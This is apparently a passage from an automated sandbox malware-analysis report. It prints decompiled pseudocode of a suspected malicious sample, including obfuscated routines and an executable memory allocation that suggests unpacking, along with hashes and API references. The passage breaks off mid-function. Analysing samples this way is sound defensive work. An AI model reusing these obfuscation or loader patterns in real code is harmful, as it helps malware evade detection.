                                                                                                                                                                                                                                                                      • Associated: 00000001.00000002.817184209.000000000121D000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                      • Associated: 00000001.00000002.817258824.000000000121F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                      • Snapshot File: hcaresult_1_2_1180000_PIyT9A3jfC.jbxd
                                                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                                                      • API ID: AllocateHeap_free
                                                                                                                                                                                                                                                                      • String ID:
                                                                                                                                                                                                                                                                      • API String ID: 614378929-0
                                                                                                                                                                                                                                                                      • Opcode ID: 92a6ae2d68cf9dbe8d0c4afe4cf0655b852b6560beefab47e5d447839bfd82a0
                                                                                                                                                                                                                                                                      • Instruction ID: b1de9a81f909bed41e2fa30637fc2282dceddb05709d5ddbbb824db5f6e6ed70
                                                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: 92a6ae2d68cf9dbe8d0c4afe4cf0655b852b6560beefab47e5d447839bfd82a0
                                                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: 9B014976200306ABE7299F69D84499EFBE9FF85270F25061DE5A483680EB30A845CB74
                                                                                                                                                                                                                                                                      Uniqueness

                                                                                                                                                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                                      Control-flow Graph

                                                                                                                                                                                                                                                                      • Executed
                                                                                                                                                                                                                                                                      • Not Executed
                                                                                                                                                                                                                                                                      control_flow_graph 284 118a67d-118a688 285 118a68a-118a694 284->285 286 118a696-118a69c 284->286 285->286 287 118a6ca-118a6d5 call 1189826 285->287 288 118a69e-118a69f 286->288 289 118a6b5-118a6c6 RtlAllocateHeap 286->289 294 118a6d7-118a6d9 287->294 288->289 290 118a6c8 289->290 291 118a6a1-118a6a8 call 118c742 289->291 290->294 291->287 297 118a6aa-118a6b3 call 118c6ac 291->297 297->287 297->289
                                                                                                                                                                                                                                                                      C-Code - Quality: 95%
                                                                                                                                                                                                                                                                      			E0118A67D(void* __ecx, signed int _a4, signed int _a8) {
                                                                                                                                                                                                                                                                      				void* __esi;
                                                                                                                                                                                                                                                                      				void* _t8;
                                                                                                                                                                                                                                                                      				void* _t12;
                                                                                                                                                                                                                                                                      				signed int _t13;
                                                                                                                                                                                                                                                                      				void* _t15;
                                                                                                                                                                                                                                                                      				signed int _t18;
                                                                                                                                                                                                                                                                      				long _t19;
                                                                                                                                                                                                                                                                      
                                                                                                                                                                                                                                                                      				_t15 = __ecx;
                                                                                                                                                                                                                                                                      				_t18 = _a4;
                                                                                                                                                                                                                                                                      				if(_t18 == 0) {
                                                                                                                                                                                                                                                                      					L2:
                                                                                                                                                                                                                                                                      					_t19 = _t18 * _a8;
                                                                                                                                                                                                                                                                      					if(_t19 == 0) {
                                                                                                                                                                                                                                                                      						_t19 = _t19 + 1;
                                                                                                                                                                                                                                                                      					}
                                                                                                                                                                                                                                                                      					while(1) {
                                                                                                                                                                                                                                                                      						_t8 = RtlAllocateHeap( *0x121e1b0, 8, _t19); // executed
                                                                                                                                                                                                                                                                      						if(_t8 != 0) {
                                                                                                                                                                                                                                                                      							break;
                                                                                                                                                                                                                                                                      						}
                                                                                                                                                                                                                                                                      						__eflags = E0118C742();
                                                                                                                                                                                                                                                                      						if(__eflags == 0) {
                                                                                                                                                                                                                                                                      							L8:
                                                                                                                                                                                                                                                                      							 *((intOrPtr*)(E01189826())) = 0xc;
                                                                                                                                                                                                                                                                      							__eflags = 0;
                                                                                                                                                                                                                                                                      							return 0;
                                                                                                                                                                                                                                                                      						}
                                                                                                                                                                                                                                                                      						_t12 = E0118C6AC(_t15, _t19, __eflags, _t19);
                                                                                                                                                                                                                                                                      						_pop(_t15);
                                                                                                                                                                                                                                                                      						__eflags = _t12;
                                                                                                                                                                                                                                                                      						if(_t12 == 0) {
                                                                                                                                                                                                                                                                      							goto L8;
                                                                                                                                                                                                                                                                      						}
                                                                                                                                                                                                                                                                      					}
                                                                                                                                                                                                                                                                      					return _t8;
                                                                                                                                                                                                                                                                      				}
                                                                                                                                                                                                                                                                      				_t13 = 0xffffffe0;
                                                                                                                                                                                                                                                                      				if(_t13 / _t18 < _a8) {
                                                                                                                                                                                                                                                                      					goto L8;
                                                                                                                                                                                                                                                                      				}
                                                                                                                                                                                                                                                                      				goto L2;
                                                                                                                                                                                                                                                                      			}










                                                                                                                                                                                                                                                                      0x0118a67d
                                                                                                                                                                                                                                                                      0x0118a683
                                                                                                                                                                                                                                                                      0x0118a688
                                                                                                                                                                                                                                                                      0x0118a696
                                                                                                                                                                                                                                                                      0x0118a696
                                                                                                                                                                                                                                                                      0x0118a69c
                                                                                                                                                                                                                                                                      0x0118a69e
                                                                                                                                                                                                                                                                      0x0118a69e
                                                                                                                                                                                                                                                                      0x0118a6b5
                                                                                                                                                                                                                                                                      0x0118a6be
                                                                                                                                                                                                                                                                      0x0118a6c6
                                                                                                                                                                                                                                                                      0x00000000
                                                                                                                                                                                                                                                                      0x00000000
                                                                                                                                                                                                                                                                      0x0118a6a6
                                                                                                                                                                                                                                                                      0x0118a6a8
                                                                                                                                                                                                                                                                      0x0118a6ca
                                                                                                                                                                                                                                                                      0x0118a6cf
                                                                                                                                                                                                                                                                      0x0118a6d5
                                                                                                                                                                                                                                                                      0x00000000
                                                                                                                                                                                                                                                                      0x0118a6d5
                                                                                                                                                                                                                                                                      0x0118a6ab
                                                                                                                                                                                                                                                                      0x0118a6b0
                                                                                                                                                                                                                                                                      0x0118a6b1
                                                                                                                                                                                                                                                                      0x0118a6b3
                                                                                                                                                                                                                                                                      0x00000000
                                                                                                                                                                                                                                                                      0x00000000
                                                                                                                                                                                                                                                                      0x0118a6b3
                                                                                                                                                                                                                                                                      0x00000000
                                                                                                                                                                                                                                                                      0x0118a6b5
                                                                                                                                                                                                                                                                      0x0118a68e
                                                                                                                                                                                                                                                                      0x0118a694
                                                                                                                                                                                                                                                                      0x00000000
                                                                                                                                                                                                                                                                      0x00000000
                                                                                                                                                                                                                                                                      0x00000000

                                                                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                                                                      • RtlAllocateHeap.NTDLL(00000008,?,00000000,?,01189C5E,00000001,00000364,?,01184B88,?), ref: 0118A6BE
                                                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                                                      • Source File: 00000001.00000002.815380758.0000000001181000.00000020.00000001.01000000.00000003.sdmp, Offset: 01180000, based on PE: true
                                                                                                                                                                                                                                                                      • Associated: 00000001.00000002.815317551.0000000001180000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                      • Associated: 00000001.00000002.815648726.0000000001199000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                      • Associated: 00000001.00000002.816245564.00000000011DC000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                      • Associated: 00000001.00000002.817184209.000000000121D000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                      • Associated: 00000001.00000002.817258824.000000000121F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                      • Snapshot File: hcaresult_1_2_1180000_PIyT9A3jfC.jbxd
                                                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                                                      • API ID: AllocateHeap
                                                                                                                                                                                                                                                                      • String ID:
                                                                                                                                                                                                                                                                      • API String ID: 1279760036-0
                                                                                                                                                                                                                                                                      • Opcode ID: 12754700f2d378acea4376d9d06002fbb5a84940de16329e251150dd01c667fe
                                                                                                                                                                                                                                                                      • Instruction ID: 5fd3c7c15ff6f25c1510a2803bd0bba506df0e649d2585ea6d840832c3862960
                                                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: 12754700f2d378acea4376d9d06002fbb5a84940de16329e251150dd01c667fe
                                                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: A8F0E03150012567EB3D7A2A7C04B9A3B49BFD167CF25C023AD1597198CB20D4008EE5
                                                                                                                                                                                                                                                                      Uniqueness

                                                                                                                                                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                                      Control-flow Graph

                                                                                                                                                                                                                                                                      • Executed
                                                                                                                                                                                                                                                                      • Not Executed
                                                                                                                                                                                                                                                                      control_flow_graph 300 118bd19-118bd25 301 118bd57-118bd62 call 1189826 300->301 302 118bd27-118bd29 300->302 310 118bd64-118bd66 301->310 303 118bd2b-118bd2c 302->303 304 118bd42-118bd53 RtlAllocateHeap 302->304 303->304 306 118bd2e-118bd35 call 118c742 304->306 307 118bd55 304->307 306->301 312 118bd37-118bd40 call 118c6ac 306->312 307->310 312->301 312->304
                                                                                                                                                                                                                                                                      C-Code - Quality: 94%
                                                                                                                                                                                                                                                                      			E0118BD19(void* __ecx, long _a4) {
                                                                                                                                                                                                                                                                      				void* __esi;
                                                                                                                                                                                                                                                                      				void* _t4;
                                                                                                                                                                                                                                                                      				void* _t6;
                                                                                                                                                                                                                                                                      				void* _t7;
                                                                                                                                                                                                                                                                      				long _t8;
                                                                                                                                                                                                                                                                      
                                                                                                                                                                                                                                                                      				_t7 = __ecx;
                                                                                                                                                                                                                                                                      				_t8 = _a4;
                                                                                                                                                                                                                                                                      				if(_t8 > 0xffffffe0) {
                                                                                                                                                                                                                                                                      					L7:
                                                                                                                                                                                                                                                                      					 *((intOrPtr*)(E01189826())) = 0xc;
                                                                                                                                                                                                                                                                      					__eflags = 0;
                                                                                                                                                                                                                                                                      					return 0;
                                                                                                                                                                                                                                                                      				}
                                                                                                                                                                                                                                                                      				if(_t8 == 0) {
                                                                                                                                                                                                                                                                      					_t8 = _t8 + 1;
                                                                                                                                                                                                                                                                      				}
                                                                                                                                                                                                                                                                      				while(1) {
                                                                                                                                                                                                                                                                      					_t4 = RtlAllocateHeap( *0x121e1b0, 0, _t8); // executed
                                                                                                                                                                                                                                                                      					if(_t4 != 0) {
                                                                                                                                                                                                                                                                      						break;
                                                                                                                                                                                                                                                                      					}
                                                                                                                                                                                                                                                                      					__eflags = E0118C742();
                                                                                                                                                                                                                                                                      					if(__eflags == 0) {
                                                                                                                                                                                                                                                                      						goto L7;
                                                                                                                                                                                                                                                                      					}
                                                                                                                                                                                                                                                                      					_t6 = E0118C6AC(_t7, _t8, __eflags, _t8);
                                                                                                                                                                                                                                                                      					_pop(_t7);
                                                                                                                                                                                                                                                                      					__eflags = _t6;
                                                                                                                                                                                                                                                                      					if(_t6 == 0) {
                                                                                                                                                                                                                                                                      						goto L7;
                                                                                                                                                                                                                                                                      					}
                                                                                                                                                                                                                                                                      				}
                                                                                                                                                                                                                                                                      				return _t4;
                                                                                                                                                                                                                                                                      			}








                                                                                                                                                                                                                                                                      0x0118bd19
                                                                                                                                                                                                                                                                      0x0118bd1f
                                                                                                                                                                                                                                                                      0x0118bd25
                                                                                                                                                                                                                                                                      0x0118bd57
                                                                                                                                                                                                                                                                      0x0118bd5c
                                                                                                                                                                                                                                                                      0x0118bd62
                                                                                                                                                                                                                                                                      0x00000000
                                                                                                                                                                                                                                                                      0x0118bd62
                                                                                                                                                                                                                                                                      0x0118bd29
                                                                                                                                                                                                                                                                      0x0118bd2b
                                                                                                                                                                                                                                                                      0x0118bd2b
                                                                                                                                                                                                                                                                      0x0118bd42
                                                                                                                                                                                                                                                                      0x0118bd4b
                                                                                                                                                                                                                                                                      0x0118bd53
                                                                                                                                                                                                                                                                      0x00000000
                                                                                                                                                                                                                                                                      0x00000000
                                                                                                                                                                                                                                                                      0x0118bd33
                                                                                                                                                                                                                                                                      0x0118bd35
                                                                                                                                                                                                                                                                      0x00000000
                                                                                                                                                                                                                                                                      0x00000000
                                                                                                                                                                                                                                                                      0x0118bd38
                                                                                                                                                                                                                                                                      0x0118bd3d
                                                                                                                                                                                                                                                                      0x0118bd3e
                                                                                                                                                                                                                                                                      0x0118bd40
                                                                                                                                                                                                                                                                      0x00000000
                                                                                                                                                                                                                                                                      0x00000000
                                                                                                                                                                                                                                                                      0x0118bd40
                                                                                                                                                                                                                                                                      0x00000000

                                                                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                                                                      • RtlAllocateHeap.NTDLL(00000000,?,?,?,0118A5A1,00000000), ref: 0118BD4B
                                                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                                                      • Source File: 00000001.00000002.815380758.0000000001181000.00000020.00000001.01000000.00000003.sdmp, Offset: 01180000, based on PE: true
                                                                                                                                                                                                                                                                      • Associated: 00000001.00000002.815317551.0000000001180000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                      • Associated: 00000001.00000002.815648726.0000000001199000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                      • Associated: 00000001.00000002.816245564.00000000011DC000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                      • Associated: 00000001.00000002.817184209.000000000121D000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                      • Associated: 00000001.00000002.817258824.000000000121F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                      • Snapshot File: hcaresult_1_2_1180000_PIyT9A3jfC.jbxd
                                                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                                                      • API ID: AllocateHeap
                                                                                                                                                                                                                                                                      • String ID:
                                                                                                                                                                                                                                                                      • API String ID: 1279760036-0
                                                                                                                                                                                                                                                                      • Opcode ID: bfba58d3928336214fb702713e7bbec475da2921bb5c2a03e9cf9e08ac5d82fb
                                                                                                                                                                                                                                                                      • Instruction ID: 5dcf2c391b1d8d3453eef7b649bfbed76a143c9f8773f458d45e010cdd6d6869
                                                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: bfba58d3928336214fb702713e7bbec475da2921bb5c2a03e9cf9e08ac5d82fb
                                                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: 86E06531518226BBE63D3E6E9C04BAE7F4C9B512BCF158321AD659A190DB10D8008EEB
                                                                                                                                                                                                                                                                      Uniqueness

                                                                                                                                                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                                      Control-flow Graph

                                                                                                                                                                                                                                                                      • Executed
                                                                                                                                                                                                                                                                      • Not Executed
                                                                                                                                                                                                                                                                      control_flow_graph 316 11847e0-1184843 317 1184849-1184856 316->317 318 11848ef-11848f5 316->318 319 1184858-1184887 317->319 320 1184889-11848be VirtualAlloc 317->320 321 1184900-1184912 318->321 322 11848c3-11848ea 319->322 320->322 323 1184984-118498d 321->323 324 1184914-118492c 321->324 322->323 325 1184937-1184957 324->325 326 1184959-118497d 325->326 327 118497f 325->327 326->325 327->321
                                                                                                                                                                                                                                                                      C-Code - Quality: 100%
                                                                                                                                                                                                                                                                      			E011847E0(signed int _a4, intOrPtr _a8, signed int _a16, intOrPtr _a20, intOrPtr _a24) {
                                                                                                                                                                                                                                                                      				signed int _v8;
                                                                                                                                                                                                                                                                      				intOrPtr _v12;
                                                                                                                                                                                                                                                                      				signed int _v16;
                                                                                                                                                                                                                                                                      				intOrPtr _v20;
                                                                                                                                                                                                                                                                      				intOrPtr _v24;
                                                                                                                                                                                                                                                                      				intOrPtr _v28;
                                                                                                                                                                                                                                                                      				signed int _v32;
                                                                                                                                                                                                                                                                      				intOrPtr _v36;
                                                                                                                                                                                                                                                                      				intOrPtr _v40;
                                                                                                                                                                                                                                                                      				long _v44;
                                                                                                                                                                                                                                                                      				long _v48;
                                                                                                                                                                                                                                                                      				intOrPtr _t74;
                                                                                                                                                                                                                                                                      				void* _t82;
                                                                                                                                                                                                                                                                      				intOrPtr _t84;
                                                                                                                                                                                                                                                                      				intOrPtr _t87;
                                                                                                                                                                                                                                                                      				intOrPtr _t94;
                                                                                                                                                                                                                                                                      				intOrPtr _t107;
                                                                                                                                                                                                                                                                      				intOrPtr _t123;
                                                                                                                                                                                                                                                                      				intOrPtr _t127;
                                                                                                                                                                                                                                                                      
                                                                                                                                                                                                                                                                      				_v28 = _a16 - 0x2598;
                                                                                                                                                                                                                                                                      				_v36 = _a24 + 0x14d;
                                                                                                                                                                                                                                                                      				_v24 = _a20 - 0xce;
                                                                                                                                                                                                                                                                      				_v8 = _a4 ^ 0x000002bf;
                                                                                                                                                                                                                                                                      				_v40 = _a24 + 0x221;
                                                                                                                                                                                                                                                                      				_v16 = _a16 ^ 0x00000221;
                                                                                                                                                                                                                                                                      				_v32 = _a20 + 0x1ce;
                                                                                                                                                                                                                                                                      				if(_v8 == _v40 - 0x219) {
                                                                                                                                                                                                                                                                      					_v12 = _v28;
                                                                                                                                                                                                                                                                      					while(_v12 < (_v16 & 0x0000253b) - 0x2633) {
                                                                                                                                                                                                                                                                      						_t94 =  *0x121d5ec; // 0x121d5f0
                                                                                                                                                                                                                                                                      						_v20 =  *((intOrPtr*)(_t94 + 0xbadc65));
                                                                                                                                                                                                                                                                      						while(1) {
                                                                                                                                                                                                                                                                      							_t74 =  *0x121d5ec; // 0x121d5f0
                                                                                                                                                                                                                                                                      							if(_v20 <= (_v16 | 0x00002801) +  *((intOrPtr*)(_t74 + 0xbadc81))) {
                                                                                                                                                                                                                                                                      								break;
                                                                                                                                                                                                                                                                      							}
                                                                                                                                                                                                                                                                      							_v24 = ( *(_a8 + 0xec) & 0x00002796) -  *((intOrPtr*)(_a8 + 0xbadbed)) + _v24;
                                                                                                                                                                                                                                                                      							_v20 = _v20 + 3;
                                                                                                                                                                                                                                                                      						}
                                                                                                                                                                                                                                                                      						_v12 = _v12 + 4;
                                                                                                                                                                                                                                                                      					}
                                                                                                                                                                                                                                                                      				} else {
                                                                                                                                                                                                                                                                      					if( *((intOrPtr*)(_a8 + 0xb0)) <= 0xd708) {
                                                                                                                                                                                                                                                                      						_v48 = 0x3000;
                                                                                                                                                                                                                                                                      						_t123 =  *0x121d5ec; // 0x121d5f0
                                                                                                                                                                                                                                                                      						_t26 = _t123 + 0x8c; // 0x0
                                                                                                                                                                                                                                                                      						_v44 =  *_t26 + 0x40;
                                                                                                                                                                                                                                                                      						_t82 = VirtualAlloc(0,  *(_a8 + 0x24), _v48, _v44); // executed
                                                                                                                                                                                                                                                                      						 *0x121d684 = _t82 + 0x2000;
                                                                                                                                                                                                                                                                      					} else {
                                                                                                                                                                                                                                                                      						_t87 =  *0x121d5ec; // 0x121d5f0
                                                                                                                                                                                                                                                                      						_t23 = _t87 + 0xdc; // 0x8
                                                                                                                                                                                                                                                                      						_t107 =  *0x121d5ec; // 0x121d5f0
                                                                                                                                                                                                                                                                      						 *(_t107 + 0xdc) = ( *(_a8 + 0x9c) ^  *(_a8 + 0x8c)) + 0x0001cd0c |  *_t23;
                                                                                                                                                                                                                                                                      					}
                                                                                                                                                                                                                                                                      					_t84 =  *0x121d5ec; // 0x121d5f0
                                                                                                                                                                                                                                                                      					_t34 = _t84 + 0x78; // 0x79aca
                                                                                                                                                                                                                                                                      					_t127 =  *0x121d5ec; // 0x121d5f0
                                                                                                                                                                                                                                                                      					 *((intOrPtr*)(_t127 + 0x5c)) =  *_t34 +  *(_a8 + 0x8c) - 0x4b764;
                                                                                                                                                                                                                                                                      				}
                                                                                                                                                                                                                                                                      				return _v32 ^ 0x0000003b;
                                                                                                                                                                                                                                                                      			}






















                                                                                                                                                                                                                                                                      0x011847ee
                                                                                                                                                                                                                                                                      0x011847fa
                                                                                                                                                                                                                                                                      0x01184806
                                                                                                                                                                                                                                                                      0x01184811
                                                                                                                                                                                                                                                                      0x0118481d
                                                                                                                                                                                                                                                                      0x01184829
                                                                                                                                                                                                                                                                      0x01184834
                                                                                                                                                                                                                                                                      0x01184843
                                                                                                                                                                                                                                                                      0x011848f2
                                                                                                                                                                                                                                                                      0x01184900
                                                                                                                                                                                                                                                                      0x0118491c
                                                                                                                                                                                                                                                                      0x01184929
                                                                                                                                                                                                                                                                      0x01184937
                                                                                                                                                                                                                                                                      0x01184948
                                                                                                                                                                                                                                                                      0x01184957
                                                                                                                                                                                                                                                                      0x00000000
                                                                                                                                                                                                                                                                      0x00000000
                                                                                                                                                                                                                                                                      0x0118497a
                                                                                                                                                                                                                                                                      0x01184934
                                                                                                                                                                                                                                                                      0x01184934
                                                                                                                                                                                                                                                                      0x011848fd
                                                                                                                                                                                                                                                                      0x011848fd
                                                                                                                                                                                                                                                                      0x01184849
                                                                                                                                                                                                                                                                      0x01184856
                                                                                                                                                                                                                                                                      0x01184889
                                                                                                                                                                                                                                                                      0x01184890
                                                                                                                                                                                                                                                                      0x01184896
                                                                                                                                                                                                                                                                      0x0118489f
                                                                                                                                                                                                                                                                      0x011848b3
                                                                                                                                                                                                                                                                      0x011848be
                                                                                                                                                                                                                                                                      0x01184858
                                                                                                                                                                                                                                                                      0x01184870
                                                                                                                                                                                                                                                                      0x01184875
                                                                                                                                                                                                                                                                      0x0118487b
                                                                                                                                                                                                                                                                      0x01184881
                                                                                                                                                                                                                                                                      0x01184881
                                                                                                                                                                                                                                                                      0x011848c9
                                                                                                                                                                                                                                                                      0x011848ce
                                                                                                                                                                                                                                                                      0x011848e1
                                                                                                                                                                                                                                                                      0x011848e7
                                                                                                                                                                                                                                                                      0x011848e7
                                                                                                                                                                                                                                                                      0x0118498d

                                                                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                                                                      • VirtualAlloc.KERNEL32(00000000,?,00003000,?), ref: 011848B3
                                                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                                                      • Source File: 00000001.00000002.815380758.0000000001181000.00000020.00000001.01000000.00000003.sdmp, Offset: 01180000, based on PE: true
                                                                                                                                                                                                                                                                      • Associated: 00000001.00000002.815317551.0000000001180000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                      • Associated: 00000001.00000002.815648726.0000000001199000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                      • Associated: 00000001.00000002.816245564.00000000011DC000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                      • Associated: 00000001.00000002.817184209.000000000121D000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                      • Associated: 00000001.00000002.817258824.000000000121F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                      • Snapshot File: hcaresult_1_2_1180000_PIyT9A3jfC.jbxd
                                                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                                                      • API ID: AllocVirtual
                                                                                                                                                                                                                                                                      • String ID:
                                                                                                                                                                                                                                                                      • API String ID: 4275171209-0
                                                                                                                                                                                                                                                                      • Opcode ID: 516cbc4b11abf0762fe2a9cc5bc575376c18d8e3ce889587526feb3be4c1c9bc
                                                                                                                                                                                                                                                                      • Instruction ID: 649daea8c2b10340fadcf0197a00d25922bfdac3056de921c63b6b9e51d4b68f
                                                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: 516cbc4b11abf0762fe2a9cc5bc575376c18d8e3ce889587526feb3be4c1c9bc
                                                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: 00512D70900109DFEB18DF98D494BAEB7B2FF88304F14C26AD815AB745D735A951CF94
                                                                                                                                                                                                                                                                      Uniqueness

                                                                                                                                                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                                      C-Code - Quality: 68%
                                                                                                                                                                                                                                                                      			E01182800(intOrPtr _a4, signed int _a8, signed int _a12, signed int _a16, intOrPtr _a20, intOrPtr _a24) {
                                                                                                                                                                                                                                                                      				signed int _v8;
                                                                                                                                                                                                                                                                      				signed int _v12;
                                                                                                                                                                                                                                                                      				signed int _v16;
                                                                                                                                                                                                                                                                      				signed int _v20;
                                                                                                                                                                                                                                                                      				signed int _v24;
                                                                                                                                                                                                                                                                      				signed int _v28;
                                                                                                                                                                                                                                                                      				signed int _v32;
                                                                                                                                                                                                                                                                      				signed int _v36;
                                                                                                                                                                                                                                                                      				intOrPtr _v40;
                                                                                                                                                                                                                                                                      				signed int _v44;
                                                                                                                                                                                                                                                                      				intOrPtr _v48;
                                                                                                                                                                                                                                                                      				intOrPtr _v52;
                                                                                                                                                                                                                                                                      				intOrPtr _v56;
                                                                                                                                                                                                                                                                      				signed int _v60;
                                                                                                                                                                                                                                                                      				intOrPtr _v64;
                                                                                                                                                                                                                                                                      				signed int _v68;
                                                                                                                                                                                                                                                                      				void* _v72;
                                                                                                                                                                                                                                                                      				long _v76;
                                                                                                                                                                                                                                                                      				long _v80;
                                                                                                                                                                                                                                                                      				struct _SECURITY_ATTRIBUTES* _v84;
                                                                                                                                                                                                                                                                      				long _v88;
                                                                                                                                                                                                                                                                      				long _v92;
                                                                                                                                                                                                                                                                      				CHAR* _v96;
                                                                                                                                                                                                                                                                      				int* _v100;
                                                                                                                                                                                                                                                                      				char* _v104;
                                                                                                                                                                                                                                                                      				int _v108;
                                                                                                                                                                                                                                                                      				char* _v112;
                                                                                                                                                                                                                                                                      				int _v116;
                                                                                                                                                                                                                                                                      				short* _v120;
                                                                                                                                                                                                                                                                      				int _v124;
                                                                                                                                                                                                                                                                      				int _v128;
                                                                                                                                                                                                                                                                      				intOrPtr _t296;
                                                                                                                                                                                                                                                                      				intOrPtr _t331;
                                                                                                                                                                                                                                                                      				intOrPtr _t332;
                                                                                                                                                                                                                                                                      				intOrPtr _t345;
                                                                                                                                                                                                                                                                      				intOrPtr _t350;
                                                                                                                                                                                                                                                                      				intOrPtr _t360;
                                                                                                                                                                                                                                                                      				intOrPtr _t376;
                                                                                                                                                                                                                                                                      				signed int _t414;
                                                                                                                                                                                                                                                                      				intOrPtr _t446;
                                                                                                                                                                                                                                                                      				intOrPtr _t454;
                                                                                                                                                                                                                                                                      				intOrPtr _t468;
                                                                                                                                                                                                                                                                      
                                                                                                                                                                                                                                                                      				_v8 = _a20 - 0x2796;
                                                                                                                                                                                                                                                                      				_v32 = _a8 + 0x254;
                                                                                                                                                                                                                                                                      				_v16 = _a12 - 0x2506;
                                                                                                                                                                                                                                                                      				_v12 = _a16 ^ 0x000026e5;
                                                                                                                                                                                                                                                                      				_v20 = _a8 ^ 0x00002565;
                                                                                                                                                                                                                                                                      				_v24 = _a12;
                                                                                                                                                                                                                                                                      				_v28 = _a24 - 0x54;
                                                                                                                                                                                                                                                                      				if(_v20 > _v16 + 0x2633) {
                                                                                                                                                                                                                                                                      					_v36 = _v8;
                                                                                                                                                                                                                                                                      					while(_v36 >= ( *(_a4 + 0x9c) ^  *(_a4 + 0x50))) {
                                                                                                                                                                                                                                                                      						 *(_a4 + 0xf4) = _v28 | _v28 |  *(_a4 + 0xf4);
                                                                                                                                                                                                                                                                      						_t331 =  *0x121d5ec; // 0x121d5f0
                                                                                                                                                                                                                                                                      						_t332 =  *0x121d5ec; // 0x121d5f0
                                                                                                                                                                                                                                                                      						 *((intOrPtr*)(_t332 + 0xbadca9)) =  *((intOrPtr*)(_t331 + 0xbadca9)) - (_v20 | _v16);
                                                                                                                                                                                                                                                                      						 *0x121d6a0 =  *(_a4 + 0x38) - _v32;
                                                                                                                                                                                                                                                                      						_v68 = _v12 - 0x00002565 ^ _v16;
                                                                                                                                                                                                                                                                      						__imp__GetCurrentActCtx(_v68);
                                                                                                                                                                                                                                                                      						_v96 =  *(_a4 + 0xbadbc1) ^ _v28 | _v20;
                                                                                                                                                                                                                                                                      						_v92 = _v20 *  *(_a4 + 0x38) - 0x2628;
                                                                                                                                                                                                                                                                      						_t414 =  *0x121d6cc; // 0x8
                                                                                                                                                                                                                                                                      						_v88 = (_t414 | 0x000025a0) ^  *(_a4 + 0x4c);
                                                                                                                                                                                                                                                                      						_v84 = _v12 -  *((intOrPtr*)(_a4 + 0xdc)) | 0x00002598;
                                                                                                                                                                                                                                                                      						_v80 = _v16 -  *0x0121D620;
                                                                                                                                                                                                                                                                      						_v76 = _v24 +  *((intOrPtr*)(_a4 + 0x8c));
                                                                                                                                                                                                                                                                      						_t345 =  *0x121d5ec; // 0x121d5f0
                                                                                                                                                                                                                                                                      						_t180 = _t345 + 0x9c; // 0x14b95e
                                                                                                                                                                                                                                                                      						_v72 =  *((intOrPtr*)(_a4 + 0xdc)) +  *_t180;
                                                                                                                                                                                                                                                                      						CreateFileA(_v96, _v92, _v88, _v84, _v80, _v76, _v72);
                                                                                                                                                                                                                                                                      						_v16 = (_v8 * 0x27b9 +  *((intOrPtr*)(_a4 + 0xbadc71))) * _v16;
                                                                                                                                                                                                                                                                      						_t350 =  *0x121d5ec; // 0x121d5f0
                                                                                                                                                                                                                                                                      						_v128 = ( *(_t350 + 0xbadbed) &  *(_a4 + 0xac)) * 0x283a;
                                                                                                                                                                                                                                                                      						_v124 = _v8 - _v20 & _v28;
                                                                                                                                                                                                                                                                      						_v120 =  *0x0121D6B4 | _v12 | 0x000025a0;
                                                                                                                                                                                                                                                                      						_v116 = _v8 * _v24;
                                                                                                                                                                                                                                                                      						_v112 =  *(_a4 + 0xb4) ^  *0x01DCB271 | 0x00002674;
                                                                                                                                                                                                                                                                      						_v108 = _v20 - _v32 - 0x26e5;
                                                                                                                                                                                                                                                                      						_v104 = _v24 +  *(_a4 + 0xec) |  *(_a4 + 0xb0);
                                                                                                                                                                                                                                                                      						_t360 =  *0x121d5ec; // 0x121d5f0
                                                                                                                                                                                                                                                                      						_v100 =  *(_a4 + 0xb4) + _v24 -  *((intOrPtr*)(_t360 + 4));
